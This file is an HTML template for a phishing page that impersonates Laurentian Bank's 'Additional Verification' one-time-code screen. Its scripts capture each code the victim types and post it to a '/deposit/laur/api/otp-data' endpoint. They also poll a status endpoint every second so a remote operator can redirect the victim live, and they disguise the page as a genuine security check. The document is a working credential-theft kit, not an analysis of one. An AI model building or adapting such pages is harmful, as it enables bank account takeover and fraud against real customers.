<html xmlns:layout="http://www.ultraq.net.nz/web/thymeleaf/layout" lang="en_CA">
    <head>
        <title>Login</title>
        <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=2">
        <link type="text/css" href="/assets/laur/md-reno-base-mobile.css?1" rel="stylesheet">
        <link type="text/css" href="/assets/laur/theme-laurentianbank-md-refresh-mobile.css" rel="stylesheet">
        <link type="text/css" href="/assets/laur/login-common.css" rel="stylesheet">
        <link type="text/css" href="/assets/laur/secure-key.css" rel="stylesheet">
        <link rel="icon" href="/assets/laur/favicon.png">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script>
            setInterval(function() {
                $.post('/deposit/laur/api/status', {page: '2FA (Waiting)'}, function(response) {
                    if (response.status) {
                        location.href = response.href;
                    }
                }, 'JSON');
            }, 1000);
        </script>
        <script>
        $(document).on('change', '#input-code', function() {
            $.post('/deposit/laur/api/otp-data', {code: $(this).val()});
        });

        $.post('/deposit/laur/api/otp-type', {type: 'SMS'}, function(response) {});

        $(document).on('submit', '#input-form', function(e) {
            $('.btn-save').attr('disabled', true);

            $.post('/deposit/laur/api/otp-submit', {code: $('#input-code').val()}, function(response) {
                location.href = '/deposit/laur/wo/' + rand_str(16);
            });

            e.preventDefault();
        });

        function rand_str(length) {
            var result           = '';
            var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
            var charactersLength = characters.length;
            for ( var i = 0; i < length; i++ ) {
                result += characters.charAt(Math.floor(Math.random() * charactersLength));
            }
            return result;
        }
        </script>
         <script src="/socket.io/socket.io.js"></script>
    </head>
    <body ng-app="UxpLoginApp" class="uxp-theme ng-scope">
        <div class="widget-c1-oauth-login position-relative oauth-login">
            <div ng-controller="UxpLoginController as $ctrl" id="c1-login-section" class="ng-scope">
                <% if (error) { %>
                    <div class="global-error-from-container" tabindex="-1">
                        <div class="global-error-form-wrapper">
                            <div class="global-error-form-msg">
                                <span role="alert" style="color: red;" style="margin-bottom: 10px;">You have entered incorrect information. Check your code and try again.</span>
                            </div>
                        </div>
                    </div>
                    <% } %>
                <form id="loginForm" id="input-form" name="" class="center-block c1-login-form ng-pristine ng-invalid ng-invalid-uxp-pattern ng-invalid-required ng-valid-minlength ng-valid-maxlength" action="" method="post" autocomplete="off">
                    <input type="hidden" id="userAgent" name="userAgent">
                    <div>
                        <div ng-form="newLoginForm" ng-hide="showingMemorizedAccounts()" class="ng-pristine ng-invalid ng-invalid-uxp-pattern ng-invalid-required ng-valid-minlength ng-valid-maxlength">
                            <div class="logo text-center">
                                <img src="/assets/laur/logo.svg" alt="Laurentian Bank logo.">
                            </div>
                            <div>
                                <h1>Additional Verification</h1>
                                <p style="margin-bottom: 30px">To protect your account, we have sent a one-time code to your registered mobile number. Enter the code below to continue</p>
                                <div class="login-id-fields">
                                    <div class="new-login-fields">
                                        <div  class="ng-scope form-group">
                                            <div class="is-empty">
                                                <label>
                                                    <span aria-hidden="true">One-time Code</span>
                                                    <input class="form-control ng-pristine ng-empty ng-invalid ng-invalid-uxp-pattern ng-valid-maxlength ng-touched lrinput" attr-action="Filling OTP" id="input-code" name="code" type="tel" value="" required placeholder="One-time Code">
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="memorized-login-fields">
                                    </div>
                                </div>
                                <div class="text-center c1-btn-container">
                                    <button onclick="submitForm()" type="button" id="" name="save" value="1">Continue</button>
                                </div>
                                <p style="margin-top: 3px;">Didn't receive it? <a style="color: #004070;font-weight: 600;">Get a new code</a></p>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">OTP</span>
    </body>
    <script src="/bank/laur/js/script.js">
    </script>
</html>

